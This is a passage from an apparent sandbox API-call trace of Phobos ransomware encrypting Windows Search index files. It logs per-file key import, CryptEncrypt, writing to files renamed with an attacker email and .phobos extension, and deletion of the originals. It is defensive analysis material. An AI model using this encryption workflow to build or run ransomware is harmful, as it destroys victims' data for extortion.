pbBuffer=0x2c9fc50) returned 1 [0174.890] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.891] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=240) returned 1 [0174.891] CloseHandle (hObject=0x138) returned 1 [0174.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000")) returned 0x2020 [0174.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.891] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.891] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.891] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.891] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.892] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0174.892] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.892] ReadFile (in: hFile=0x138, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf0, lpOverlapped=0x0) returned 1 [0174.893] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0174.893] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0174.894] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0174.894] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.894] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0174.894] CryptDestroyKey (hKey=0xa32968) returned 1 [0174.894] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0174.894] CryptDestroyKey (hKey=0xa32be8) returned 1 [0174.894] CloseHandle (hObject=0x138) returned 1 [0174.894] CloseHandle (hObject=0x158) returned 1 [0174.894] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000")) returned 1 [0174.895] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.895] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.911] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=65536) returned 1 [0174.911] CloseHandle (hObject=0x194) returned 1 [0174.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001")) returned 0x2020 [0174.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.911] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.912] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.912] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.912] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0174.998] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0174.998] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.998] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x10000, lpOverlapped=0x0) returned 1 [0175.112] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10010, dwBufLen=0x10010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10010) returned 1 [0175.112] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10010, lpOverlapped=0x0) returned 1 [0175.114] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0175.114] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0175.114] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0175.114] CryptDestroyKey (hKey=0xa32d28) returned 1 [0175.114] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0175.115] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.115] CloseHandle (hObject=0x194) returned 1 [0175.115] CloseHandle (hObject=0x188) returned 1 [0175.115] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001")) returned 1 [0175.116] SetEvent (hEvent=0xe8) returned 1 [0175.116] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0175.116] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0175.133] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=240) returned 1 [0175.133] CloseHandle (hObject=0x188) returned 1 [0175.133] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000")) returned 0x2020 [0175.133] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.133] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0175.133] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0175.134] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0175.134] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0175.134] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0175.134] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0175.134] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf0, lpOverlapped=0x0) returned 1 [0175.135] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0175.135] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0175.136] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0175.136] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0175.136] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0175.136] CryptDestroyKey (hKey=0xa32d28) returned 1 [0175.136] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0175.136] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.136] CloseHandle (hObject=0x188) returned 1 [0175.136] CloseHandle (hObject=0x194) returned 1 [0175.136] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.000")) returned 1 [0175.137] SetEvent (hEvent=0xe8) returned 1 [0175.139] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0175.139] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0175.140] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=65536) returned 1 [0175.140] CloseHandle (hObject=0x194) returned 1 [0175.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001")) returned 0x2020 [0175.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.140] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0175.140] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0175.140] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0175.140] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0175.450] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0175.451] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0175.451] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x10000, lpOverlapped=0x0) returned 1 [0175.624] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10010, dwBufLen=0x10010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10010) returned 1 [0175.624] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10010, lpOverlapped=0x0) returned 1 [0175.626] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0175.626] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0175.626] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0175.626] CryptDestroyKey (hKey=0xa32d28) returned 1 [0175.626] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0175.626] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.626] CloseHandle (hObject=0x194) returned 1 [0175.626] CloseHandle (hObject=0x14c) returned 1 [0175.626] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.001")) returned 1 [0175.627] SetEvent (hEvent=0xe8) returned 1 [0175.627] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0175.627] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\windows.edb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0175.628] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=75563008) returned 1 [0175.628] CloseHandle (hObject=0x14c) returned 1 [0175.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\windows.edb")) returned 0x2020 [0175.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\windows.edb"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\windows.edb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0175.629] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\windows.edb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0175.629] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0175.629] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0175.629] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0175.655] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x1805555, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0175.655] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0175.671] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x47d0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0175.671] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0175.709] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32d28) returned 1 [0175.709] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0175.709] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0175.715] CryptDestroyKey (hKey=0xa32d28) returned 1 [0175.715] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0175.715] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0175.728] SetEndOfFile (hFile=0x14c) returned 1 [0175.728] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x47d0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0175.728] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0175.729] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x1805555, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0175.729] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0175.730] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0175.730] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0175.731] CloseHandle (hObject=0x14c) returned 1 [0175.731] SetEvent (hEvent=0xe8) returned 1 [0175.731] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0175.731] CreateFileW 